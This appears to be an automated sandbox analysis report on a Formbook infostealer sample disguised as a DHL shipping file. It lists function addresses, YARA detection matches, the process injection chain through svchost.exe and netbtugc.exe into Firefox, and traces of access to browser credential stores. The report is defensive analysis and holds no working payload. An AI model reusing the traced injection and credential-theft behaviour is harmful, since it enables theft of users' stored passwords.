Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F42840	2_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F56962	2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFEEDB	2_2_02FFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52E90	2_2_02F52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFCE93	2_2_02FFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40E59	2_2_02F40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFEE26	2_2_02FFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4CFE0	2_2_02F4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32FC8	2_2_02F32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBEFA0	2_2_02FBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB4F40	2_2_02FB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60F30	2_2_02F60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F82F28	2_2_02F82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30CF2	2_2_02F30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0CB5	2_2_02FE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40C00	2_2_02F40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3ADE0	2_2_02F3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F58DBF	2_2_02F58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDCD1F	2_2_02FDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4AD00	2_2_02F4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE12ED	2_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5B2C0	2_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F452A0	2_2_02F452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F8739A	2_2_02F8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2D34C	2_2_02F2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF132D	2_2_02FF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF70E9	2_2_02FF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFF0E0	2_2_02FFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEF0CC	2_2_02FEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F470C0	2_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300B16B	2_2_0300B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4B1B0	2_2_02F4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2F172	2_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7516C	2_2_02F7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF16CC	2_2_02FF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFF7B0	2_2_02FFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F31460	2_2_02F31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFF43F	2_2_02FFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDD5B0	2_2_02FDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF7571	2_2_02FF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEDAC6	2_2_02FEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDDAAC	2_2_02FDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F85AA0	2_2_02F85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB3A6C	2_2_02FB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFA49	2_2_02FFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF7A46	2_2_02FF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB5BF0	2_2_02FB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7DBF9	2_2_02F7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5FB80	2_2_02F5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFB76	2_2_02FFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F438E0	2_2_02F438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAD800	2_2_02FAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F49950	2_2_02F49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5B950	2_2_02F5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD5910	2_2_02FD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F49EB0	2_2_02F49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFFB1	2_2_02FFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F41F92	2_2_02F41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFF09	2_2_02FFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFCF2	2_2_02FFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB9C32	2_2_02FB9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5FDC0	2_2_02F5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF7D73	2_2_02FF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF1D5A	2_2_02FF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F43D40	2_2_02F43D40
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031BF3B7	3_2_031BF3B7
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031C5AB5	3_2_031C5AB5
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031C5AB7	3_2_031C5AB7
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031DC997	3_2_031DC997
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031BF197	3_2_031BF197
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031BF18E	3_2_031BF18E
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031BD437	3_2_031BD437
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379A352	4_2_0379A352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037A03E6	4_2_037A03E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036EE3F0	4_2_036EE3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03780274	4_2_03780274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037602C0	4_2_037602C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03768158	4_2_03768158
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036D0100	4_2_036D0100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0377A118	4_2_0377A118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037981CC	4_2_037981CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037A01AA	4_2_037A01AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03772000	4_2_03772000
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E0770	4_2_036E0770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03704750	4_2_03704750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036DC7C0	4_2_036DC7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036FC6E0	4_2_036FC6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E0535	4_2_036E0535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037A0591	4_2_037A0591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03792446	4_2_03792446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0378E4F6	4_2_0378E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379AB40	4_2_0379AB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03796BD7	4_2_03796BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036DEA80	4_2_036DEA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036F6962	4_2_036F6962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E29A0	4_2_036E29A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037AA9A6	4_2_037AA9A6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E2840	4_2_036E2840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036EA840	4_2_036EA840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0370E8F0	4_2_0370E8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036C68B8	4_2_036C68B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03754F40	4_2_03754F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03700F30	4_2_03700F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03722F28	4_2_03722F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036ECFE0	4_2_036ECFE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036D2FC8	4_2_036D2FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0375EFA0	4_2_0375EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E0E59	4_2_036E0E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379EE26	4_2_0379EE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379EEDB	4_2_0379EEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379CE93	4_2_0379CE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036F2E90	4_2_036F2E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0377CD1F	4_2_0377CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036EAD00	4_2_036EAD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036DADE0	4_2_036DADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036F8DBF	4_2_036F8DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E0C00	4_2_036E0C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036D0CF2	4_2_036D0CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03780CB5	4_2_03780CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036CD34C	4_2_036CD34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379132D	4_2_0379132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0372739A	4_2_0372739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037812ED	4_2_037812ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036FB2C0	4_2_036FB2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E52A0	4_2_036E52A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037AB16B	4_2_037AB16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0371516C	4_2_0371516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036CF172	4_2_036CF172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036EB1B0	4_2_036EB1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037970E9	4_2_037970E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379F0E0	4_2_0379F0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E70C0	4_2_036E70C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0378F0CC	4_2_0378F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379F7B0	4_2_0379F7B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_037916CC	4_2_037916CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03797571	4_2_03797571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0377D5B0	4_2_0377D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036D1460	4_2_036D1460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379F43F	4_2_0379F43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379FB76	4_2_0379FB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03755BF0	4_2_03755BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0371DBF9	4_2_0371DBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036FFB80	4_2_036FFB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03753A6C	4_2_03753A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379FA49	4_2_0379FA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03797A46	4_2_03797A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0378DAC6	4_2_0378DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03725AA0	4_2_03725AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0377DAAC	4_2_0377DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E9950	4_2_036E9950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036FB950	4_2_036FB950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03775910	4_2_03775910
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0374D800	4_2_0374D800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E38E0	4_2_036E38E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379FF09	4_2_0379FF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379FFB1	4_2_0379FFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E1F92	4_2_036E1F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E9EB0	4_2_036E9EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03797D73	4_2_03797D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03791D5A	4_2_03791D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036E3D40	4_2_036E3D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036FFDC0	4_2_036FFDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03759C32	4_2_03759C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0379FCF2	4_2_0379FCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DC15E0	4_2_02DC15E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DC30F0	4_2_02DC30F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DC30EE	4_2_02DC30EE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DBC7D0	4_2_02DBC7D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DBC7C7	4_2_02DBC7C7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DBAA70	4_2_02DBAA70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DBC9F0	4_2_02DBC9F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DD9FD0	4_2_02DD9FD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0358A0AF	4_2_0358A0AF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0358B9D6	4_2_0358B9D6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0358B8B4	4_2_0358B8B4
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0358BD6C	4_2_0358BD6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0358ADD8	4_2_0358ADD8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F87E54 appears 101 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02FAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02FBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F2B970 appears 275 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 03715130 appears 57 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0374EA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 036CB970 appears 275 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0375F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 03727E54 appears 101 times
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: String function: 008D7F41 appears 35 times
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: String function: 008F0D27 appears 70 times
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: String function: 008F8B40 appears 42 times

Source: DHL 806-232024.exe, 00000000.00000003.2061513410.00000000038B3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL 806-232024.exe
Source: DHL 806-232024.exe, 00000000.00000003.2063495490.0000000003A5D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL 806-232024.exe

Source: DHL 806-232024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@14/7

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_0093A2D5 GetLastError,FormatMessageW,

0_2_0093A2D5

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00928713 AdjustTokenPrivileges,CloseHandle,		0_2_00928713
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00928CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00928CC3

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_0093B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0093B59E

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_0094F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0094F121

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_009486D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_009486D0

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_008D4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_008D4FE9

Source: C:\Users\user\Desktop\DHL 806-232024.exe

File created: C:\Users\user\AppData\Local\Temp\aut87C5.tmp

Jump to behavior

Source: DHL 806-232024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000004.00000002.4529839998.0000000003292000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4529839998.00000000032BE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2395534024.0000000003292000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2395417337.0000000003271000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL 806-232024.exe	Virustotal: Detection: 29%
Source: DHL 806-232024.exe	ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\DHL 806-232024.exe "C:\Users\user\Desktop\DHL 806-232024.exe"
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 806-232024.exe"
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 806-232024.exe"	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: wsock32.dll	Jump to behavior
